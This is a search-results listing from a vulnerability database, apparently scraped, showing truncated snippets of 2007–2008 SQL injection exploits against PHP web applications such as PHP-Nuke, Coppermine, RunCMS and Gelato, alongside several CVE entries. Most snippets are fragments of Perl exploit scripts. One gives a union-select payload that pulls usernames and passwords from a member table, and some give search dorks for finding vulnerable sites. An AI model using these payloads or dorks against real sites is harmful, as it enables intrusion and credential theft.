Lucene search
K

2104 matches found

0day.today
0day.today
added 2008/03/16 12:0 a.m.21 views

phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications ============================================================ phpBP HACKBOX.pl query"SELECT FROM $confprefixbanners WHERE id=$GETid" or $db-errFILE, LINE; 13 14 if$db-numrows==0 15 16 redirect'index.php?module=error?error=bannerserror2'; 17...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2008/02/09 12:0 a.m.48 views

Limbo CMS 1.0.4.2 - &#039;Cuid&#039; cookie Blind SQL Injection

!/usr/bin/python ================================================================================================= / | |\ \ / | / |/ | | |/ \ | | | |||| /| / / ================================================================================================= This is a Public Exploit. Date:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2008/01/31 12:0 a.m.23 views

ibproarcade-sql.txt

!/usr/bin/perl ibProArcade "r57ibProArcade" ; $mw-geometry '420x310' ; $mw-resizable0,0; $mw-Label-text = '!', -font = 'Webdings 22'-pack; $mw-Label-text = 'ibProArcade sql injection exploit by RST/GHC', -font = 'Verdana 7 bold',-foreground='red'-pack; $mw-Label-text = ''-pack;...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2008/01/31 12:0 a.m.18 views

ibProArcade &lt;= 3.3.0 Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl ibProArcade = v3.3.0 sql injection exploit coded by 1dt.w0lf RST/GHC THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE KEEP IT PRIVATE use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; BEGIN if$^O eq 'MSWin32' require Win32::Console;...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2008/01/24 12:0 a.m.25 views

cpg1414-sql.txt

table prefix\n"; print " - hostname\n"; print " - web dirname \n"; print " - force mode - '0' - for Off or "album number" for force mode On \n"; print " table prefix - prefix of sql tables\n"; print " example: " . $argv0 . " coppermine.site photo/ 1 cpg1410\n"; credits; / FUNCTIONS / if...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2008/01/22 12:0 a.m.15 views

Coppermine Photo Gallery 1.4.10 - SQL Injection

Coppermine Photo Gallery 1.4.10 - SQL Injection table prefix\n"; print " - hostname\n"; print " - web dirname \n"; print " - force mode - '0' - for Off or "album number" for force mode On \n"; print " table prefix - prefix of sql tables\n"; print " example: " . $argv0 . " coppermine.site photo/ 1...

0.5AI score
Exploits0
0day.today
0day.today
added 2008/01/22 12:0 a.m.22 views

PHP-Nuke < 8.0 (sid) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ================================================= PHP-Nuke version Tested on 7.9 & 6.0 '; if $argc table prefix\n"; print "ex.: " . $argv0 . " phpnuke.org 7\n"; credits; exit; / few definitions / if empty$argv3 $prefix = 'nuke'; define...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2008/01/07 12:0 a.m.36 views

FlexBB 0.6.3 - Cookies SQL Injection

!/usr/bin/perl use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindowtitle = "UnderWHAT?!" ; $mw-geometry '420x343' ; $mw-resizable0,0; $mw-Label-text = '', -font = 'Verdana 8',-foreground='red'-pack; $mw-Label-text = 'FlexBB 'Tahoma 7 bold',-foreground='red'-pac...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2008/01/06 12:0 a.m.22 views

RunCMS Newbb_plus 0.92 - Client IP SQL Injection

RunCMS Newbbplus 0.92 - Client IP SQL Injection !/usr/bin/perl use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindowtitle = "UnderWHAT?!" ; $mw-geometry '420x383' ; $mw-resizable0,0; $mw-Label-text = '', -font = 'Verdana 8',-foreground='red'-pack; $mw-Label-text...

0.4AI score
Exploits0
0day.today
0day.today
added 2008/01/06 12:0 a.m.33 views

RunCMS Newbb_plus <= 0.92 Client IP Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ================================================================ RunCMS Newbbplus "UnderWHAT?!" ; $mw-geometry '420x383' ; $mw-resizable0,0; $mw-Label-text = '', -font = 'Verdana 8',-foreground='red'-pack; $mw-Label-text = 'Newbbplus 'Taho...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2008/01/06 12:0 a.m.34 views

RunCMS Newbb_plus 0.92 - Client IP SQL Injection

!/usr/bin/perl use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindowtitle = "UnderWHAT?!" ; $mw-geometry '420x383' ; $mw-resizable0,0; $mw-Label-text = '', -font = 'Verdana 8',-foreground='red'-pack; $mw-Label-text = 'Newbbplus 'Tahoma 7...

7AI score
Exploits0
Packet Storm
Packet Storm
added 2007/12/31 12:0 a.m.30 views

myphp-sql.txt

Name : MyPHP Forum So we can execute an sql injection thrught the bugged variable $id. PoC: http://Site/faq.php?action=view&id=-1'+union+select+1,concatusername,0x3a,password,3+from+tableprefixmember+where+uid=1/ Sql injection in member.php So $member variable isn't controlled so we can exploit i...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2007/09/14 12:0 a.m.36 views

Gelato - &#039;index.php?post&#039; SQL Injection

? Gelato SQL Injection exploit Dork: "powered by gelato cms" Homepage: http://gelatocms.com s 0 c r a t e x msn: s0cratexatnasadotgov greetz: D.O.M and plexinium team iniset"maxexecutiontime",0; function gettext $in = fopen"php://stdin", 'r'; $text = fgets$in, 1024; $text = trim$text; return $tex...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2007/08/02 12:0 a.m.33 views

paBugs 2.0 Beta 3 - main.php?cid SQL Injection

paBugs 2.0 Beta 3 - main.php?cid SQL Injection !/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; if@ARGV get$sql or err; $res - content = /0-9,a-f32/ or err; print "\n + Admin Passwordmd5=$usid is: $1 \n\n"; sub usage print "---------------------------------------------------------\n"; print ...

0.7AI score
Exploits0
Positive Technologies
Positive Technologies
added 2007/08/01 12:0 a.m.4 views

PT-2007-5319 · Php · Phpwebfilemanager

Name of the Vulnerable Software and Affected Versions: phpWebFileManager version 0.5 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the PN PathPrefix parameter in the index.php file. However, this issue is disputed by a reliable third party, who...

6.8CVSS7.9AI score0.01349EPSS
Exploits0References6
seebug.org
seebug.org
added 2007/07/22 12:0 a.m.13 views

WSN Links Basic Edition (displaycat catid) SQL Injection Vulnerbility

No description provided by source. --==+================================================================================+==-- --==+ WSN Links Basic Edition SQL Injection Vulnerbility +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz ...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2007/07/21 12:0 a.m.50 views

WSN Links Basic Edition - &#039;catid&#039; SQL Injection

--==+================================================================================+==-- --==+ WSN Links Basic Edition SQL Injection Vulnerbility +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SITE: wsnforum.com DORK:...

7AI score
Exploits0
seebug.org
seebug.org
added 2007/07/18 12:0 a.m.16 views

Md-Pro &lt;= 1.0.8x (Topics topicid) Remote SQL Injection Vulnerability

No description provided by source. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Site: http://www.maxdev.com Download: http://www.maxdev.com/mod-Areafiles-display-lid-510-cid-1.phtml Dork: "Powered by Md-Pro" !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!...

7.1AI score
Exploits0
NVD
NVD
added 2007/06/27 12:30 a.m.15 views

CVE-2007-3434

index.php in Pharmacy System 2 and earlier allows remote attackers to obtain sensitive information via a ' quote character in the page parameter, which reveals the table prefix in an error message...

5CVSS6.1AI score0.02684EPSS
Exploits0References5
Prion
Prion
added 2007/06/27 12:30 a.m.15 views

Code injection

index.php in Pharmacy System 2 and earlier allows remote attackers to obtain sensitive information via a ' quote character in the page parameter, which reveals the table prefix in an error message...

5CVSS6.6AI score0.02684EPSS
Exploits0References5Affected Software1
Rows per page
Query Builder